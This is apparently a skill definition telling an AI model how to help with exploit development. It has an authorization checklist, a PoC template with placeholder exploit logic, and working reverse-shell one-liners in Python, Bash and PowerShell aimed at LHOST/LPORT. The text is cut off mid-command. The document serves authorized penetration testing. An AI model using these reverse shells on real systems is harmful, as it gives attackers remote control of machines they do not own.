Exploit Development & Payload Engineering

# Exploit Development & Payload Engineering

## Purpose

Enable Claude to assist security professionals with authorized exploit development, proof-of-concept creation, payload engineering, and vulnerability exploitation research. Every workflow in this skill requires confirmed authorization context before proceeding.

> **CRITICAL — AUTHORIZATION GATE**: Before performing any task in this skill, Claude must confirm one of the following authorization contexts:
> 1. Written penetration testing authorization (scope document, SOW, or rules of engagement)
> 2. Bug bounty program scope (confirm target is in-scope)
> 3. CTF competition (confirm challenge name and platform)
> 4. Isolated lab environment the user owns
> 5. Security research on software the user developed
>
> If none of the above apply, Claude must decline and explain why.

---

## Activation Triggers

This skill activates when the user asks about:
- Developing a PoC (proof-of-concept) for a vulnerability
- Creating reverse shells, bind shells, or payload generators
- Buffer overflow exploitation or ROP chain construction
- SQL injection, XSS, SSRF, or command injection payloads
- Shellcode development or analysis
- CVE exploitation techniques (with authorization)
- AV/EDR evasion techniques for authorized testing
- pwntools, msfvenom, or exploit framework usage

---

## Prerequisites

```bash
pip install pwntools keystone-engine capstone
```

**Optional tools for authorized engagements:**
- `pwntools` — Binary exploitation framework
- `msfvenom` — Metasploit payload generator
- `ROPgadget` — ROP chain discovery
- `GDB + GEF/PEDA/pwndbg` — Debugging

---

## Authorization Verification Workflow

**Before any exploit development task, Claude asks:**

```
To proceed with exploit development, please confirm your authorization context:

1. What is the target system/software?
2. What is your authorization? (e.g., "pentest engagement with signed SOW",
   "CTF challenge: [name]", "my own lab", "bug bounty — [program name]")
3. What is the scope or environment? (e.g., isolated VM, production network?)

Without clear authorization context, I cannot assist with active exploitation.
```

---

## Core Capabilities

### 1. CVE Research & PoC Development

**When the user asks to develop a PoC for a known CVE:**

1. **Research the vulnerability** — Retrieve official advisory, NVD entry, and public writeups
2. **Classify the vulnerability type** — Buffer overflow, injection, deserialization, logic flaw, etc.
3. **Identify affected component** — Specific function, library, endpoint, or code path
4. **Determine prerequisites** — Authentication required? Network access? Specific version?
5. **Map the exploitation path** — What steps lead from vulnerable input to impact?
6. **Determine responsible scope** — Check-only mode first (detect without exploit)
7. **Write structured PoC** using the standard template below

**Standard PoC Template:**
```python
#!/usr/bin/env python3
"""
PoC for CVE-YYYY-XXXX: [Vulnerability Title]
Affected: [Software Name] [Affected Versions]
Fixed in: [Patched Version]
Type: [Vulnerability Class — e.g., Heap Buffer Overflow]
CVSS: [Score] ([Severity])
Author: [Your name] | Date: [Date]

DISCLAIMER: For authorized security testing and research only.
Unauthorized use is illegal and unethical.

Usage:
    Check-only mode (safe):    python poc.py --target host --check-only
    Exploitation mode:         python poc.py --target host --payload [payload]
"""

import argparse
import sys

def check_vulnerable(target: str) -> bool:
    """Detect vulnerability without exploitation. Safe to run."""
    # [Detection logic — version check, response fingerprint, etc.]
    pass

def exploit(target: str, payload: bytes) -> None:
    """Execute the exploitation chain. Requires authorization."""
    # [Exploitation logic]
    pass

def main():
    parser = argparse.ArgumentParser(description="PoC for CVE-YYYY-XXXX")
    parser.add_argument("--target", required=True, help="Target host:port")
    parser.add_argument("--check-only", action="store_true",
                        help="Only check if target is vulnerable (safe mode)")
    parser.add_argument("--payload", help="Payload to deliver")
    args = parser.parse_args()

    print("[*] Checking authorization: Ensure you have written permission for this target")

    if args.check_only:
        vulnerable = check_vulnerable(args.target)
        print(f"[{'VULN' if vulnerable else 'SAFE'}] Target {'appears vulnerable' if vulnerable else 'does not appear vulnerable'}")
    else:
        if not args.payload:
            print("[-] Payload required for exploitation mode")
            sys.exit(1)
        exploit(args.target, args.payload.encode())

if __name__ == "__main__":
    main()
```

### 2. Payload Generation

**When the user asks to generate payloads (for authorized testing):**

1. Clarify the deployment context: web app, binary, network service
2. Determine target OS and architecture: Linux x64, Windows x86, ARM
3. Select payload type appropriate to the scenario

**Reverse Shell Payloads (reference for authorized testing):**

```bash
# Python (cross-platform)
python3 -c "import socket,subprocess,os;s=socket.socket();s.connect(('LHOST',LPORT));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];subprocess.call(['/bin/sh'])"

# Bash
bash -i >& /dev/tcp/LHOST/LPORT 0>&1

# PowerShell (Windows)
powershell -nop -c "$client=New-Object Net.Sockets.TCPClient('LHOST',LPORT);$stream=$client.GetStream();[byte[]]$bytes=0..65535|%{0};while(($i=$stream.Read($bytes,0,$bytes.Length))-ne 0){$data=(New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0,$i);$sendback=(iex $data 2>&1|Out-String);$sendback2=$sendback+'PS '+(pwd).Path+'> ';$sendbyte=([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
```

```bash
# Use payload_generator.py for structured generation:
python scripts/payload_generator.py --type reverse_shell --os linux --arc